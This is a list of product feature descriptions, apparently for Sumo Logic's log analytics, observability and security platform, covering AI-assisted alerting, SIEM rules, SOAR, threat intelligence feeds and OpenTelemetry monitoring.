Sumo Logic

AutoML-powered anomaly detection to reduce false positives in real-time alerting

AI models to detect suspicious and anomalous deviations from baseline behaviors

Multi-agent AI platform powered by specialized agents that identify, triage, and resolve issues faster

Collection of apps leveraging machine learning to create advanced operational and security insights benchmarked against population of Sumo Logic customers

Level of confidence predicted by Sumo Logic's Global Intelligence ML model that the Insight is actionable

Instant AI answers to platform questions

Unified conversational interface that connects users to specialized AI agents

Machine learning-driven SOAR that learns repeatable patterns, distinguishes between real and false threats, and offers recommended courses of action

Turns natural language requests into queries, simplifying data exploration

Automates alert triage to identify threats and speed response (beta)

Condenses Insight signals into summaries, reducing noise and highlighting context

Combination of multiple Machine Learning capabilities working together to ensure smooth and uninterrupted SecOps workflow

Aggregate distributed trace data and derive advanced analytics using Sumo Logic Query Language

Provides contextual insights about triggered alerts to minimize investigation and resolution time

Quickly identify anomalies and drill down into high-severity logs in the log search histogram

Ingested data fields organized into a schema for further queries and advanced analytics

View information about an Entity in an Insight and all other connected (related) entities or systems

View information about entity activity before, during, and after Signals and Insights involving the entity

Automatically visualize IP addresses in dashboards by geolocation

Transparent rules engine applied to incoming logs to surface Signals and Insights with 900+ out-of-the-box rules

Dashboard offering suggestions for making adjustments to rules, such as writing rule tuning expressions and changing severities

Use Sumo Logic's Query Language and Dashboarding Framework to parse, aggregate and visualize insights from raw log data

Patented operators designed to quickly assess activity patterns and surface behavioral insights to accelerate troubleshooting

Enrich log data ingested by Sumo Logic in real time with in-memory lookup tables

Predict future time series metrics values using linear and auto-regressive models for resource and capacity planning

Forecast trends and identify anomalous activity in real time with advanced query operators

Manage software delivery performance against industry-standard DORA metrics

Route contextualized alerts to 3rd party tools including Slack, PagerDuty, ServiceNow to streamline investigations

Integrate Sumo Logic's Log Search capabilities into workflows and 3rd party tools via API for complex use cases

Administor Sumo Logic and manage users via API and/or with IaC tooling like Terraform

Easily set up and configure native OTel data ingest and install relevant content to quickly derive insights

Enable k8s OTel collection with Sumo Logic's Helm Chart

Access to 400+ apps and integrations designed to turn data into insights

Native support for collection of OpenTelemetry with pre-built analytics to monitor and respond to user-impacting performance issues

Full-stack observability with MELT telemetry to ensure application reliability

Out-of-the-box analytics visualize k8s hierarchical relationships to simplify troubleshooting across clusters

Power SLIs and SLOs using metrics

Deep observability for multi-cloud organizations across AWS, Azure, GCP with pre-built integrations

Monitor real-user interactions across applications with pre-built visualizations and alerts powered by OpenTelemetry

Simple setup and monitoring of critical user journeys, error budgets and more using pre-built SLO dashboards

Easily understand relationships of complex service interactions across applications to simplify troubleshooting

Tools for managing and documenting security cases, including evidence collection, analysis, and reporting

Continuously view the overall state of cybersecurity readiness of your cloud environment

Speed up incident investigations by automatically triaging alerts and correlating threats through log analytics

Security Orchestration, Automation and Response for automated incident response workflows

Identify indicators of compromise (IOCs) in log data by comparing against CrowdStrike IOC feed

Security platform that provides protection, compliance, and AI-driven guided search to help resolve incidents faster

Shows MITRE ATT&CK adversary tactics, techniques, and procedures from Enterprise Matrix covered by rules in system

Includes CrowdStrike, Intel471, and other native threat intel feeds to add context to SIEM rules

Quantifying the possibility of major impacts on business-critical processes due to cybersecurity threats

Centralized repository for security logs and data enabling advanced analytics

Support for federated identity access management and single sign-on

Detect security threats faster with AI-powered analysis of logs and security data

Suite of UEBA-specific rules designed to detect various classifications of anomalous activities compared against normal baselines

Configurations for war room management in security operations